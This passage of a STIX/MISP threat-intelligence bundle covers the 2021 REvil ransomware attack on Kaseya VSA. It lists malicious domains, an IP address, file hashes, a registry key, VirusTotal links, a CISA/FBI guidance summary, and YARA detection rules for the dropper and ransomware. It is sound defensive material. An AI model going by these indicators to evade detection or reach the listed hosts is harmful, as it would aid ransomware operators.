activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b1c574bc-446c-437d-ac2f-31fe56889df8", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'simoneblum.de']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--bbdf4eb4-3f5f-435e-81a3-27eeea6ab88b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'gmto.fr']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--38f1ecc6-4e89-40db-a826-c2eda523f946", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'cerebralforce.net']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--3275524c-6128-4a8e-86c5-3aa90362f9e3", 
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'myhostcloud.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9c0ffa35-e772-4341-b04b-8c63a3385982", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'fotoscondron.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--0dedcd10-8c29-4647-80f1-8eca7d58bef2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'sw1m.ru']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--575f1379-0074-410a-9433-49b8b9958118", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'homng.net']", "pattern_type": "stix", 
"pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--10036ce7-76fb-44b5-95ec-aa98744391b2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:16:00.000Z", "modified": "2021-07-05T08:16:00.000Z", "first_observed": "2021-07-05T08:16:00Z", "last_observed": "2021-07-05T08:16:00Z", "number_observed": 1, "object_refs": [ "url--10036ce7-76fb-44b5-95ec-aa98744391b2" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--10036ce7-76fb-44b5-95ec-aa98744391b2", "value": "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--0a0a5eaa-39aa-474e-91f7-16818eb45441", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-07T09:35:06.000Z", "modified": "2021-07-07T09:35:06.000Z", "first_observed": "2021-07-07T09:35:06Z", "last_observed": "2021-07-07T09:35:06Z", "number_observed": 1, "object_refs": [ "url--0a0a5eaa-39aa-474e-91f7-16818eb45441" ], "labels": [ "misp:type=\"url\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--0a0a5eaa-39aa-474e-91f7-16818eb45441", "value": "https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--86947a18-f1ed-4ef9-bdfc-cd6d5f586179", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T07:58:29.000Z", "modified": "2021-07-05T07:58:29.000Z", "pattern": "[file:hashes.SHA256 = '8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd' AND 
file:name = 'mpsvc.dll' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T07:58:29Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--83cac77f-3395-4e66-8748-4a3c93f13f9f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T07:59:12.000Z", "modified": "2021-07-05T07:59:12.000Z", "pattern": "[(network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '161.35.239.148')]", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T07:59:12Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "network" } ], "labels": [ "misp:name=\"ip-port\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--0bb49474-a26d-448c-a5fe-6a646bae941d", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:01:00.000Z", "modified": "2021-07-05T08:01:00.000Z", "pattern": "[file:hashes.SHA256 = 'd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e' AND file:name = 'agent.exe' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:01:00Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--94d2a666-8901-4fdd-b637-12cd14214ed9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:01:41.000Z", "modified": "2021-07-05T08:01:41.000Z", "pattern": "[file:hashes.SHA256 = 
'45aebd60e3c4ed8d3285907f5bf6c71b3b60a9bcb7c34e246c20410cf678fc0c' AND file:name = 'agent.crt']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:01:41Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--382db752-d40a-44b4-8043-8ed41ad534df", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:02:40.000Z", "modified": "2021-07-05T08:02:40.000Z", "pattern": "[file:hashes.MD5 = 'a47cf00aedf769d60d58bfe00c0b5421' AND file:hashes.SHA1 = '656c4d285ea518d90c1b669b79af475db31e30b1' AND file:hashes.SHA256 = '8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:02:40Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--f5e08151-622f-4b0f-9a5f-3b329b8da50c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:02:41.000Z", "modified": "2021-07-05T08:02:41.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-07-05T07:25:40+00:00", "category": "Other", "uuid": "b82380c0-f8d1-4628-93db-30b0329f769c" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/gui/file/8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd/detection/f-8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd-1625469940", "category": "Payload delivery", "uuid": "9928eec8-58f6-4045-bb3e-a262fd2ba91d" }, { "type": "text", 
"object_relation": "detection-ratio", "value": "48/67", "category": "Payload delivery", "uuid": "7e59ed0f-cab2-4281-a782-9da359ec6216" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b5e68470-eac8-4708-9c02-bd24d67639d9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "pattern": "[file:hashes.MD5 = '561cffbaba71a6e8cc1cdceda990ead4' AND file:hashes.SHA1 = '5162f14d75e96edb914d1756349d6e11583db0b0' AND file:hashes.SHA256 = 'd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:15:24Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--6b906ba0-33c1-4070-8962-49359d7ab1e1", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:02:41.000Z", "modified": "2021-07-05T08:02:41.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-07-05T07:38:02+00:00", "category": "Other", "uuid": "62f89fbb-f229-43f3-9070-42136d2b9dcf" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/gui/file/d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e/detection/f-d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e-1625470682", "category": "Payload delivery", "uuid": "9f23d9a9-531e-4989-8855-9a9ab929a3b0" }, { "type": "text", "object_relation": "detection-ratio", "value": "45/67", "category": "Payload delivery", "uuid": "c2ed79ca-fec5-4be8-8c84-2458aba65061" } ], "x_misp_meta_category": 
"misc", "x_misp_name": "virustotal-report" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--66a1099e-fc17-4447-a35a-671d1dce2b3a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:04:38.000Z", "modified": "2021-07-05T08:04:38.000Z", "labels": [ "misp:name=\"report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "link", "object_relation": "link", "value": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", "category": "External analysis", "uuid": "3d161d9c-33c4-4e4b-b1e0-9fa940089aab" }, { "type": "text", "object_relation": "summary", "value": "CISA and the Federal Bureau of Investigation (FBI) continue to respond to the recent supply-chain ransomware attack leveraging a vulnerability in Kaseya VSA software against multiple managed service providers (MSPs) and their customers. CISA and FBI strongly urge affected MSPs and their customers to follow the guidance below.\r\n\r\nCISA and FBI recommend affected MSPs:\r\n\r\n Download the Kaseya VSA Detection Tool\r\n\r\n . This tool analyzes a system (either VSA server or managed endpoint) and determines whether any indicators of compromise (IoC) are present. \r\n Enable and enforce multi-factor authentication (MFA) on every single account that is under the control of the organization, and\u2014to the maximum extent possible\u2014enable and enforce MFA for customer-facing services.\r\n Implement allowlisting to limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and/or\r\n Place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.\r\n\r\nCISA and FBI recommend MSP customers affected by this attack take immediate action to implement the following cybersecurity best practices. 
Note: these actions are especially important for MSP customers who do not currently have their RMM service running due to the Kaseya attack.\r\n\r\nCISA and FBI recommend affected MSP customers:\r\n\r\n Ensure backups are up to date and stored in an easily retrievable location that is air-gapped from the organizational network;\r\n Revert to a manual patch management process that follows vendor remediation guidance, including the installation of new patches as soon as they become available;\r\n Implement:\r\n Multi-factor authentication; and\r\n Principle of least privilege for admin accounts on key network resources.", "category": "Other", "uuid": "8927e0f4-f8e0-455a-a97c-5fcaf825e8bb" }, { "type": "text", "object_relation": "type", "value": "Alert", "category": "Other", "uuid": "fb986017-9d19-403f-929e-959fe625dbea" } ], "x_misp_meta_category": "misc", "x_misp_name": "report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b86e6a60-1bc6-4b06-9816-7d253d8136af", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:06:34.000Z", "modified": "2021-07-05T08:06:34.000Z", "pattern": "/* Via https://github.com/bartblaze/Yara-rules/blob/master/rules/ransomware/REvil_Cert.yar\r\n*/\r\n\r\nimport \\\\\"pe\\\\\"\r\nrule REvil_Cert\r\n{\r\nmeta:\r\n\tdescription = \\\\\"Identifies the digital certificate PB03 TRANSPORT LTD, used by REvil in the Kaseya supply chain attack.\\\\\"\r\n\tauthor = \\\\\"@bartblaze\\\\\"\r\n\tdate = \\\\\"2021-07\\\\\"\r\n\treference = \\\\\"https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers\\\\\"\r\n\ttlp = \\\\\"White\\\\\"\r\n\t\r\ncondition:\r\n\tuint16(0) == 0x5a4d and\r\n\t\tfor any i in (0 .. 
pe.number_of_signatures) : (\r\n\t\tpe.signatures[i].serial == \\\\\"11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0\\\\\"\r\n\t)\r\n}", "pattern_type": "yara", "pattern_version": "2.1", "valid_from": "2021-07-05T08:06:34Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "misc" } ], "labels": [ "misp:name=\"yara\"", "misp:meta-category=\"misc\"", "misp:to_ids=\"True\"" ], "x_misp_context": "all" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--92efa833-8ea8-49ee-9d46-5fedbf946d46", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:07:06.000Z", "modified": "2021-07-05T08:07:06.000Z", "pattern": "/* Via https://github.com/bartblaze/Yara-rules/blob/master/rules/ransomware/REvil_Dropper.yar\r\n*/\r\n\r\nrule REvil_Dropper\r\n{\r\nmeta:\r\n\tdescription = \\\\\"Identifies the dropper used by REvil in the Kaseya supply chain attack.\\\\\"\r\n\tauthor = \\\\\"@bartblaze\\\\\"\r\n\tdate = \\\\\"2021-07\\\\\"\r\n\thash = \\\\\"d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e\\\\\"\r\n \treference = \\\\\"https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers\\\\\"\r\n\ttlp = \\\\\"White\\\\\"\r\n\t\r\nstrings:\r\n $ = { 55 8b ec 56 8b 35 24 d0 40 00 68 04 1c 41 00 6a 65 6a 00 ff \r\n d6 85 c0 0f 84 98 00 00 00 50 6a 00 ff 15 20 d0 40 00 85 c0 0f 84 \r\n 87 00 00 00 50 ff 15 18 d0 40 00 68 14 1c 41 00 6a 66 6a 00 a3 a0 \r\n 43 41 00 ff d6 85 c0 74 6c 50 33 f6 56 ff 15 20 d0 40 00 85 c0 74 \r\n 5e 50 ff 15 18 d0 40 00 68 24 1c 41 00 ba 88 55 0c 00 a3 a4 43 41 \r\n 00 8b c8 e8 9a fe ff ff 8b 0d a0 43 41 00 ba d0 56 00 00 c7 04 ?4 \r\n 38 1c 41 00 e8 83 fe ff ff c7 04 ?4 ec 43 41 00 68 a8 43 41 00 56 \r\n 56 68 30 02 00 00 56 56 56 ff 75 10 c7 05 a8 43 41 00 44 00 00 00 \r\n 50 ff 15 28 d0 40 00 }\r\n\t\r\ncondition:\r\n\tall of them\r\n}", "pattern_type": "yara", "pattern_version": "2.1", "valid_from": "2021-07-05T08:07:06Z", 
"kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "misc" } ], "labels": [ "misp:name=\"yara\"", "misp:meta-category=\"misc\"", "misp:to_ids=\"True\"" ], "x_misp_context": "all" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--22682f05-d593-4378-983c-e247b5f6df07", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:07:41.000Z", "modified": "2021-07-05T08:07:41.000Z", "pattern": "/* Via: https://github.com/Neo23x0/signature-base/blob/master/yara/crime_revil_general.yar\r\n*/\r\n\r\nrule APT_MAL_REvil_Kaseya_Jul21_2 {\r\n meta:\r\n description = \\\\\"Detects malware used in the Kaseya supply chain attack\\\\\"\r\n author = \\\\\"Florian Roth\\\\\"\r\n reference = \\\\\"https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b\\\\\"\r\n date = \\\\\"2021-07-02\\\\\"\r\n hash1 = \\\\\"0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402\\\\\"\r\n hash2 = \\\\\"8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd\\\\\"\r\n hash3 = \\\\\"cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6\\\\\"\r\n hash4 = \\\\\"d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f\\\\\"\r\n hash5 = \\\\\"d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20\\\\\"\r\n hash6 = \\\\\"e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2\\\\\"\r\n strings:\r\n $opa1 = { 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 }\r\n $opa2 = { 89 45 f0 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 }\r\n $opa3 = { 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 0f b6 14 01 }\r\n $opa4 = { 89 45 f4 8b 0d ?? ?0 07 10 89 4d f8 8b 15 ?? 
?1 07 10 89 55 fc ff 75 fc ff 75 f8 ff 55 f4 }\r\n\r\n $opb1 = { 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc cc }\r\n $opb2 = { 18 00 10 0e 19 00 10 cc cc cc cc 8b 44 24 04 }\r\n $opb3 = { 10 c4 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc }\r\n condition:\r\n uint16(0) == 0x5a4d and\r\n filesize < 3000KB and ( 2 of ($opa*) or 3 of them )\r\n}", "pattern_type": "yara", "pattern_version": "2.1", "valid_from": "2021-07-05T08:07:41Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "misc" } ], "labels": [ "misp:name=\"yara\"", "misp:meta-category=\"misc\"", "misp:to_ids=\"True\"" ], "x_misp_context": "all" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--f1a24c1c-d479-447e-abbe-dfc97c485829", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:08:01.000Z", "modified": "2021-07-05T08:08:01.000Z", "pattern": "/* Via https://github.com/Neo23x0/signature-base/blob/e360605894c12859de36f28fda95140aa330694b/yara/crime_ransom_revil.yar\r\n*/\r\n\r\n\r\nrule MAL_RANSOM_REvil_Oct20_1 {\r\n meta:\r\n description = \\\\\"Detects REvil ransomware\\\\\"\r\n author = \\\\\"Florian Roth\\\\\"\r\n reference = \\\\\"Internal Research\\\\\"\r\n date = \\\\\"2020-10-13\\\\\"\r\n hash1 = \\\\\"5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4\\\\\"\r\n hash2 = \\\\\"f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5\\\\\"\r\n hash3 = \\\\\"f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d\\\\\"\r\n hash4 = \\\\\"fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501\\\\\"\r\n strings:\r\n $op1 = { 0f 8c 74 ff ff ff 33 c0 5f 5e 5b 8b e5 5d c3 8b }\r\n $op2 = { 8d 85 68 ff ff ff 50 e8 2a fe ff ff 8d 85 68 ff }\r\n $op3 = { 89 4d f4 8b 4e 0c 33 4e 34 33 4e 5c 33 8e 84 }\r\n $op4 = { 8d 85 68 ff ff ff 50 e8 05 06 00 00 8d 85 68 ff }\r\n $op5 = { 8d 85 68 ff ff ff 56 57 ff 75 0c 50 e8 2f }\r\n condition:\r\n uint16(0) == 0x5a4d and\r\n 
filesize < 400KB and\r\n 2 of them or 4 of them\r\n}", "pattern_type": "yara", "pattern_version": "2.1", "valid_from": "2021-07-05T08:08:01Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "misc" } ], "labels": [ "misp:name=\"yara\"", "misp:meta-category=\"misc\"", "misp:to_ids=\"True\"" ], "x_misp_context": "all" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--e0115c11-ab7d-4d4c-a7a2-078a8dc6b6dd", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:11:28.000Z", "modified": "2021-07-05T08:11:28.000Z", "pattern": "[windows-registry-key:key = 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\BlackLivesMatter']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:11:28Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"registry-key\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--80fca50b-89b9-4331-9b9a-6a62e7080126", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "pattern": "[file:hashes.SHA256 = '8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd' AND file:name = 'mpsvc.dll' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:15:24Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--e489c678-49cd-4f79-a70b-9b3de81bd252", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:14:24.000Z", "modified": "2021-07-05T08:14:24.000Z", "pattern": "[file:hashes.SHA256 = 
'33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a' AND file:name = 'msmpeng.exe' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:14:24Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--a855e025-6cbb-4c93-9585-95121ea5c55c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "pattern": "[file:hashes.MD5 = '8cc83221870dd07144e63df594c391d9' AND file:hashes.SHA1 = '3d409b39b8502fcd23335a878f2cbdaf6d721995' AND file:hashes.SHA256 = '33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:15:24Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--f42f63de-36c2-41d3-86d1-d1e3e3508da1", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-07-05T07:54:28+00:00", "category": "Other", "uuid": "d3098b51-a5b4-423d-8300-1d367736f857" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/gui/file/33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a/detection/f-33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a-1625471668", "category": "Payload delivery", "uuid": 
"d39ee2f9-56f3-42be-8de3-4e464a297c19" }, { "type": "text", "object_relation": "detection-ratio", "value": "0/68", "category": "Payload delivery", "uuid": "65828223-6628-400c-99c8-cd7a1c4e2de7" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--67af034f-5173-445b-ae08-1f1a7e9a7f87", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-07-05T08:11:57+00:00", "category": "Other", "uuid": "45e226ea-be4f-45ce-8ac1-ccdcc263a1b8" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/gui/file/8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd/detection/f-8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd-1625472717", "category": "Payload delivery", "uuid": "c93ae24c-908f-4dd0-ae98-4b376b9cf2fd" }, { "type": "text", "object_relation": "detection-ratio", "value": "48/68", "category": "Payload delivery", "uuid": "f8f3e9cd-5ff9-479d-8a71-86f210c79adb" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--e6a7fd5d-ff89-4a3f-840f-892e99de748b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-07-05T08:12:17+00:00", "category": "Other", "uuid": "1b7654f4-816d-462a-a589-1c72eeb110aa" }, { "type": "link", "object_relation": "permalink", "value": 
